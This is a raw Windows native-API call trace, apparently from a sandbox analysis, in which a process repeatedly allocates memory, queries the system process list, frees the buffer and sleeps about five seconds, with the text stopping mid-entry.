[0116.159] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0116.159] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0116.159] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0116.161] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0116.162] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0116.175] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0116.175] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0116.175] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0116.176] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0116.176] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0116.181] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0116.181] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0116.189] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0116.190] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0116.190] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0116.190] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0116.191] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0116.193] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0116.193] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0116.205] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0116.205] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0116.206] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0116.206] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0116.206] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0116.209] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0116.209] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0116.220] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0116.221] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0116.221] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0116.221] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0116.222] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0116.224] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0116.225] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0116.236] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0116.236] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0116.237] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0116.237] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0116.237] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0116.240] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0116.240] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0116.252] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0116.252] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0116.253] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0116.253] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0116.253] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0116.256] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0116.256] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0116.267] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0116.267] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0116.268] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0116.268] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0116.269] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0116.271] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0116.272] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0116.287] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0116.288] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0116.288] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0116.288] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0116.289] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0116.291] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0116.291] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0116.298] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0116.298] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0116.299] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0116.299] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0116.299] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0116.301] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0116.302] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0116.314] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0116.314] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0116.315] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0116.315] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0116.315] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0116.317] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0116.318] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0116.329] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0116.330] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0116.330] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0116.330] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0116.331] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0116.333] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0116.333] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0116.345] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0116.345] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0116.346] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0116.346] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0116.346] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0116.348] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0116.349] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0116.377] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0116.378] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0116.378] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0116.378] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0116.379] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0116.381] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0116.381] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0116.393] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0116.393] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0116.394] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0116.394] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0116.394] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0116.396] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0116.397] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0116.408] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0116.408] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0116.409] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0116.409] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0116.409] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0116.412] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0116.412] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0116.423] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0116.423] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0116.424] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0116.424] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0116.424] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0116.426] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0116.427] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0116.440] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0116.460] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0116.461] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0116.461] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0116.461] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0116.464] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0116.464] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0116.470] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0116.470] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0116.470] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0116.471] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0116.471] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0116.473] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0116.474] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0116.486] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0116.487] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0116.487] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0116.487] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0116.488] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0116.490] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0116.491] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0116.502] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0116.502] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0116.503] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0116.503] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0116.503] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0116.506] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0116.506] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0116.517] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0116.517] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0116.517] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0116.518] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: 